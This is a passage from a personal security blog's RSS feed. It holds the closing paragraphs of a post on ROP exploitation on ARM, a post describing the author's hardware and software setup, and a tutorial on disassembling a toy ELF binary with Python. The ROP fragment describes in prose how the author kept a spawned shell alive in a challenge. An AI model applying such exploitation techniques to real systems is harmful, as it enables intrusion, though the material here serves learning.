3308<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
3309when the pipe closes, since there’s no input coming in from STDIN.
3310To get around this, we use <code>cat(1)</code> which allows us to relay input through it
3311to the shell. Nifty trick.</p>
3312
3313<h2 id="conclusion">Conclusion</h2>
3314
3315<p>This was a fairly basic challenge, with everything laid out conveniently.
3316Actual ropchaining is a little more involved, with a lot more gadgets to be chained
3317to acheive code execution.</p>
3318
3319<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
3320]]></description><link>https://icyphox.sh/blog/rop-on-arm</link><pubDate>Thu, 06 Jun 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/rop-on-arm</guid></item><item><title>My setup</title><description><![CDATA[<h2 id="hardware">Hardware</h2>
3321
3322<p>The only computer I have with me is my <a href="https://store.hp.com/us/en/mdp/laptops/envy-13">HP Envy 13 (2018)</a> (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u,
33238 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.</p>
3324
3325<p>For my phone, I use a <a href="https://www.oneplus.in/6t">OnePlus 6T</a>, running stock <a href="https://www.oneplus.in/oxygenos">OxygenOS</a>. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted.
3326I’m also a proud owner of a <a href="https://en.wikipedia.org/wiki/Nexus_5">Nexus 5</a>, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.</p>
3327
3328<p>My watch is a <a href="https://www.samsung.com/in/wearables/gear-s3-frontier-r760/">Samsung Gear S3 Frontier</a>. Tizen is definitely better than Android Wear.</p>
3329
3330<p>My keyboard, although not with me in college, is a very old <a href="https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO">Dell SK-8110</a>.
3331For the little bit of gaming that I do, I use a <a href="https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html">HP m150</a> gaming mouse. It’s the perfect size (and color).</p>
3332
3333<p>For my music, I use the <a href="https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html">Bose SoundLink II</a>.
3334Great pair of headphones, although the ear cups need replacing.</p>
3335
3336<h2 id="and-the-software">And the software</h2>
3337
3338<p><del>My distro of choice for the past ~1 year has been <a href="https://elementary.io">elementary OS</a>. I used to be an Arch Linux elitist, complete with an esoteric
3339window manager, all riced. I now use whatever JustWorks™.</del></p>
3340
3341<p><strong>Update</strong>: As of June 2019, I’ve switched over to a vanilla Debian 9 Stretch install,
3342running <a href="https://i3wm.org">i3</a> as my window manager. If you want, you can dig through my configs at my <a href="https://github.com/icyphox/dotfiles">dotfiles</a> repo. </p>
3343
3344<p>Here’s a (riced) screenshot of my desktop. </p>
3345
3346<p><img src="https://i.redd.it/jk574gworp331.png" alt="scrot" /></p>
3347
3348<p>Most of my work is done in either the browser, or the terminal.
3349My shell is pure <a href="http://www.zsh.org">zsh</a>, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need
3350a framework. It’s useless bloat. The prompt itself is generated using a framework I built in <a href="https://nim-lang.org">Nim</a>—<a href="https://github.com/icyphox/nicy">nicy</a>.
3351My primary text editor is <a href="https://neovim.org">nvim</a>. Again, all configs in my dotfiles repo linked above.
3352I manage all my passwords using <a href="https://passwordstore.org">pass(1)</a>, and I use <a href="https://github.com/carnager/rofi-pass">rofi-pass</a> to access them via <code>rofi</code>.</p>
3353
3354<p>Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace
3355clean and a single command to drop into a Kali shell.</p>
3356
3357<p>I use a DigitalOcean droplet (BLR1) as a public filehost, found at <a href="https://x.icyphox.sh">x.icyphox.sh</a>. The UI is the wonderful <a href="https://github.com/zeit/serve">serve</a>, by <a href="https://zeit.co">ZEIT</a>.
3358The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. </p>
3359
3360<p>I plan on converting my desktop back at home into a homeserver setup. Soon™.</p>
3361]]></description><link>https://icyphox.sh/blog/my-setup</link><pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/my-setup</guid></item><item><title>Python for Reverse Engineering #1: ELF Binaries</title><description><![CDATA[<p>While solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.</p>
3362
3363<p>Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually build your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.</p>
3364
3365<h2 id="setup">Setup</h2>
3366
3367<p>As the title suggests, you’re going to need a Python 3 interpreter before
3368anything else. Once you’ve confirmed beyond reasonable doubt that you do,
3369in fact, have a Python 3 interpreter installed on your system, run</p>
3370
3371<div class="codehilite"><pre><span></span><code><span class="gp">$</span> pip install capstone pyelftools
3372</code></pre></div>
3373
3374<p>where <code>capstone</code> is the disassembly engine we’ll be scripting with and <code>pyelftools</code> to help parse ELF files.</p>
3375
3376<p>With that out of the way, let’s start with an example of a basic reversing
3377challenge.</p>
3378
3379<div class="codehilite"><pre><span></span><code><span class="cm">/* chall.c */</span>
3380
3381<span class="cp">#include</span> <span class="cpf"><stdio.h></span><span class="cp"></span>
3382<span class="cp">#include</span> <span class="cpf"><stdlib.h></span><span class="cp"></span>
3383<span class="cp">#include</span> <span class="cpf"><string.h></span><span class="cp"></span>
3384
3385<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
3386 <span class="kt">char</span> <span class="o">*</span><span class="n">pw</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">9</span><span class="p">);</span>
3387 <span class="n">pw</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'a'</span><span class="p">;</span>
3388 <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o"><=</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
3389 <span class="n">pw</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">pw</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
3390 <span class="p">}</span>
3391 <span class="n">pw</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
3392 <span class="kt">char</span> <span class="o">*</span><span class="n">in</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
3393 <span class="n">printf</span><span class="p">(</span><span class="s">"password: "</span><span class="p">);</span>
3394 <span class="n">fgets</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// 'abcdefghi'</span>
3395 <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="n">pw</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
3396 <span class="n">printf</span><span class="p">(</span><span class="s">"haha yes!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
3397 <span class="p">}</span>
3398 <span class="k">else</span> <span class="p">{</span>
3399 <span class="n">printf</span><span class="p">(</span><span class="s">"nah dude</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
3400 <span class="p">}</span>
3401<span class="p">}</span>
3402</code></pre></div>
3403
3404<p>Compile it with GCC/Clang:</p>
3405
3406<div class="codehilite"><pre><span></span><code><span class="gp">$</span> gcc chall.c -o chall.elf
3407</code></pre></div>
3408
3409<h2 id="scripting">Scripting</h2>
3410
3411<p>For starters, let’s look at the different sections present in the binary.</p>
3412
3413<div class="codehilite"><pre><span></span><code><span class="c1"># sections.py</span>
3414
3415<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
3416
3417<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
3418 <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
3419 <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
3420 <span class="nb">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]),</span> <span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
3421</code></pre></div>
3422
3423<p>This script iterates through all the sections and also shows us where it’s loaded. This will be pretty useful later. Running it gives us</p>
3424
3425<div class="codehilite"><pre><span></span><code><span class="go">› python sections.py</span>
3426<span class="go">0x238 .interp</span>
3427<span class="go">0x254 .note.ABI-tag</span>
3428<span class="go">0x274 .note.gnu.build-id</span>
3429<span class="go">0x298 .gnu.hash</span>
3430<span class="go">0x2c0 .dynsym</span>
3431<span class="go">0x3e0 .dynstr</span>
3432<span class="go">0x484 .gnu.version</span>
3433<span class="go">0x4a0 .gnu.version_r</span>
3434<span class="go">0x4c0 .rela.dyn</span>
3435<span class="go">0x598 .rela.plt</span>
3436<span class="go">0x610 .init</span>
3437<span class="go">0x630 .plt</span>
3438<span class="go">0x690 .plt.got</span>
3439<span class="go">0x6a0 .text</span>
3440<span class="go">0x8f4 .fini</span>
3441<span class="go">0x900 .rodata</span>
3442<span class="go">0x924 .eh_frame_hdr</span>
3443<span class="go">0x960 .eh_frame</span>
3444<span class="go">0x200d98 .init_array</span>
3445<span class="go">0x200da0 .fini_array</span>
3446<span class="go">0x200da8 .dynamic</span>
3447<span class="go">0x200f98 .got</span>
3448<span class="go">0x201000 .data</span>
3449<span class="go">0x201010 .bss</span>
3450<span class="go">0x0 .comment</span>
3451<span class="go">0x0 .symtab</span>
3452<span class="go">0x0 .strtab</span>
3453<span class="go">0x0 .shstrtab</span>
3454</code></pre></div>
3455
3456<p>Most of these aren’t relevant to us, but a few sections here are to be noted. The <code>.text</code> section contains the instructions (opcodes) that we’re after. The <code>.data</code> section should have strings and constants initialized at compile time. Finally, the <code>.plt</code> which is the Procedure Linkage Table and the <code>.got</code>, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.</p>
3457
3458<p>Since we know that the <code>.text</code> section has the opcodes, let’s disassemble the binary starting at that address.</p>
3459
3460<div class="codehilite"><pre><span></span><code><span class="c1"># disas1.py</span>
3461
3462<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
3463<span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>
3464
3465<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./bin.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
3466 <span class="n">elf</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
3467 <span class="n">code</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">get_section_by_name</span><span class="p">(</span><span class="s1">'.text'</span><span class="p">)</span>
3468 <span class="n">ops</span> <span class="o">=</span> <span class="n">code</span><span class="o">.</span><span class="n">data</span><span class="p">()</span>
3469 <span class="n">addr</span> <span class="o">=</span> <span class="n">code</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]</span>
3470 <span class="n">md</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
3471 <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">md</span><span class="o">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">ops</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
3472 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'0x</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">address</span><span class="si">:</span><span class="s1">x</span><span class="si">}</span><span class="s1">:</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">mnemonic</span><span class="si">}</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">op_str</span><span class="si">}</span><span class="s1">'</span><span class="p">)</span>
3473</code></pre></div>
3474
3475<p>The code is fairly straightforward (I think). We should be seeing this, on running</p>
3476
3477<div class="codehilite"><pre><span></span><code><span class="go">› python disas1.py | less </span>
3478<span class="go">0x6a0: xor ebp, ebp</span>
3479<span class="go">0x6a2: mov r9, rdx</span>
3480<span class="go">0x6a5: pop rsi</span>
3481<span class="go">0x6a6: mov rdx, rsp</span>
3482<span class="go">0x6a9: and rsp, 0xfffffffffffffff0</span>
3483<span class="go">0x6ad: push rax</span>
3484<span class="go">0x6ae: push rsp</span>
3485<span class="go">0x6af: lea r8, [rip + 0x23a]</span>
3486<span class="go">0x6b6: lea rcx, [rip + 0x1c3]</span>
3487<span class="go">0x6bd: lea rdi, [rip + 0xe6]</span>
3488<span class="go">**0x6c4: call qword ptr [rip + 0x200916]**</span>
3489<span class="go">0x6ca: hlt</span>
3490<span class="go">... snip ...</span>
3491</code></pre></div>
3492
3493<p>The line in bold is fairly interesting to us. The address at <code>[rip + 0x200916]</code> is equivalent to <code>[0x6ca + 0x200916]</code>, which in turn evaluates to <code>0x200fe0</code>. The first <code>call</code> being made to a function at <code>0x200fe0</code>? What could this function be?</p>
3494
3495<p>For this, we will have to look at <strong>relocations</strong>. Quoting <a href="http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html">linuxbase.org</a></p>
3496
3497<blockquote>
3498 <p>Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries’’ which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.</p>
3499</blockquote>
3500
3501<p>To try and find these relocation entries, we write a third script.</p>
3502
3503<div class="codehilite"><pre><span></span><code><span class="c1"># relocations.py</span>
3504
3505<span class="kn">import</span> <span class="nn">sys</span>
3506<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
3507<span class="kn">from</span> <span class="nn">elftools.elf.relocation</span> <span class="kn">import</span> <span class="n">RelocationSection</span>
3508
3509<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
3510 <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
3511 <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
3512 <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">section</span><span class="p">,</span> <span class="n">RelocationSection</span><span class="p">):</span>
3513 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1">:'</span><span class="p">)</span>
3514 <span class="n">symbol_table</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">get_section</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_link'</span><span class="p">])</span>
3515 <span class="k">for</span> <span class="n">relocation</span> <span class="ow">in</span> <span class="n">section</span><span class="o">.</span><span class="n">iter_relocations</span><span class="p">():</span>
3516 <span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol_table</span><span class="o">.</span><span class="n">get_symbol</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_info_sym'</span><span class="p">])</span>
3517 <span class="n">addr</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_offset'</span><span class="p">])</span>
3518 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">symbol</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1"> </span><span class="si">{</span><span class="n">addr</span><span class="si">}</span><span class="s1">'</span><span class="p">)</span>
3519</code></pre></div>
3520
3521<p>Let’s run through this code real quick. We first loop through the sections, and check if it’s of the type <code>RelocationSection</code>. We then iterate through the relocations from the symbol table for each section. Finally, running this gives us</p>
3522
3523<div class="codehilite"><pre><span></span><code><span class="go">› python relocations.py</span>
3524<span class="go">.rela.dyn:</span>
3525<span class="go"> 0x200d98</span>
3526<span class="go"> 0x200da0</span>
3527<span class="go"> 0x201008</span>
3528<span class="go">_ITM_deregisterTMCloneTable 0x200fd8</span>
3529<span class="go">**__libc_start_main 0x200fe0**</span>
3530<span class="go">__gmon_start__ 0x200fe8</span>
3531<span class="go">_ITM_registerTMCloneTable 0x200ff0</span>
3532<span class="go">__cxa_finalize 0x200ff8</span>
3533<span class="go">stdin 0x201010</span>
3534<span class="go">.rela.plt:</span>
3535<span class="go">puts 0x200fb0</span>
3536<span class="go">printf 0x200fb8</span>
3537<span class="go">fgets 0x200fc0</span>
3538<span class="go">strcmp 0x200fc8</span>
3539<span class="go">malloc 0x200fd0</span>
3540</code></pre></div>
3541
3542<p>Remember the function call at <code>0x200fe0</code> from earlier? Yep, so that was a call to the well known <code>__libc_start_main</code>. Again, according to <a href="http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib—libc-start-main-.html">linuxbase.org</a></p>
3543
3544<blockquote>
3545 <p>The <code>__libc_start_main()</code> function shall perform any necessary initialization of the execution environment, call the <em>main</em> function with appropriate arguments, and handle the return from <code>main()</code>. If the <code>main()</code> function returns, the return value shall be passed to the <code>exit()</code> function.</p>
3546</blockquote>
3547
3548<p>And its definition is like so</p>
3549
3550<div class="codehilite"><pre><span></span><code><span class="kt">int</span> <span class="nf">__libc_start_main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">),</span>
3551<span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span> <span class="n">ubp_av</span><span class="p">,</span>
3552<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
3553<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
3554<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rtld_fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
3555<span class="kt">void</span> <span class="p">(</span><span class="o">*</span> <span class="n">stack_end</span><span class="p">));</span>
3556</code></pre></div>
3557
3558<p>Looking back at our disassembly</p>
3559
3560<pre><code>0x6a0: xor ebp, ebp
35610x6a2: mov r9, rdx
35620x6a5: pop rsi
35630x6a6: mov rdx, rsp
35640x6a9: and rsp, 0xfffffffffffffff0
35650x6ad: push rax
35660x6ae: push rsp
35670x6af: lea r8, [rip + 0x23a]
35680x6b6: lea rcx, [rip + 0x1c3]
3569**0x6bd: lea rdi, [rip + 0xe6]**
35700x6c4: call qword ptr [rip + 0x200916]
35710x6ca: hlt
3572... snip ...
3573</code></pre>
3574
3575<p>but this time, at the <code>lea</code> or Load Effective Address instruction, which loads some address <code>[rip + 0xe6]</code> into the <code>rdi</code> register. <code>[rip + 0xe6]</code> evaluates to <code>0x7aa</code> which happens to be the address of our <code>main()</code> function! How do I know that? Because <code>__libc_start_main()</code>, after doing whatever it does, eventually jumps to the function at <code>rdi</code>, which is generally the <code>main()</code> function. It looks something like this</p>
3576
3577<p><img src="https://cdn-images-1.medium.com/max/800/0*oQA2MwHjhzosF8ZH.png" alt="" /></p>
3578
3579<p>To see the disassembly of <code>main</code>, seek to <code>0x7aa</code> in the output of the script we’d written earlier (<code>disas1.py</code>).</p>
3580
3581<p>From what we discovered earlier, each <code>call</code> instruction points to some function which we can see from the relocation entries. So following each <code>call</code> into their relocations gives us this</p>
3582
3583<pre><code>printf 0x650
3584fgets 0x660
3585strcmp 0x670
3586malloc 0x680
3587</code></pre>
3588
3589<p>Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.</p>
3590
3591<pre><code>0x7b2: mov edi, 0xa ; 10
35920x7b7: call 0x680 ; malloc
3593</code></pre>
3594
3595<p>The loop to populate the <code>*pw</code> string</p>
3596
3597<pre><code>0x7d0: mov eax, dword ptr [rbp - 0x14]
35980x7d3: cdqe
35990x7d5: lea rdx, [rax - 1]
36000x7d9: mov rax, qword ptr [rbp - 0x10]
36010x7dd: add rax, rdx
36020x7e0: movzx eax, byte ptr [rax]
36030x7e3: lea ecx, [rax + 1]
36040x7e6: mov eax, dword ptr [rbp - 0x14]
36050x7e9: movsxd rdx, eax
36060x7ec: mov rax, qword ptr [rbp - 0x10]
36070x7f0: add rax, rdx
36080x7f3: mov edx, ecx
36090x7f5: mov byte ptr [rax], dl
36100x7f7: add dword ptr [rbp - 0x14], 1
36110x7fb: cmp dword ptr [rbp - 0x14], 8
36120x7ff: jle 0x7d0
3613</code></pre>
3614
3615<p>And this looks like our <code>strcmp()</code></p>
3616
3617<pre><code>0x843: mov rdx, qword ptr [rbp - 0x10] ; *in
36180x847: mov rax, qword ptr [rbp - 8] ; *pw
36190x84b: mov rsi, rdx
36200x84e: mov rdi, rax
36210x851: call 0x670 ; strcmp
36220x856: test eax, eax ; is = 0?
36230x858: jne 0x868 ; no? jump to 0x868
36240x85a: lea rdi, [rip + 0xae] ; "haha yes!"
36250x861: call 0x640 ; puts
36260x866: jmp 0x874
36270x868: lea rdi, [rip + 0xaa] ; "nah dude"
36280x86f: call 0x640 ; puts
3629</code></pre>
3630
3631<p>I’m not sure why it uses <code>puts</code> here? I might be missing something; perhaps <code>printf</code> calls <code>puts</code>. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.</p>
3632
3633<p><strong>Update</strong>: It’s because of compiler optimization. A <code>printf()</code> (in this case) is seen as a bit overkill, and hence gets simplified to a <code>puts()</code>.</p>
3634
3635<h2 id="conclusion">Conclusion</h2>
3636
3637<p>Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or probably didn’t even understand what was going on. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.</p>
3638
3639<p>All the code used in this post is here: <a href="https://github.com/icyphox/asdf/tree/master/reversing-elf">https://github.com/icyphox/asdf/tree/master/reversing-elf</a></p>
3640
3641<p>Ciao for now, and I’ll see ya in #2 of this series—PE binaries. Whenever that is.</p>
3642]]></description><link>https://icyphox.sh/blog/python-for-re-1</link><pubDate>Fri, 08 Feb 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/python-for-re-1</guid></item></channel>
3643</rss>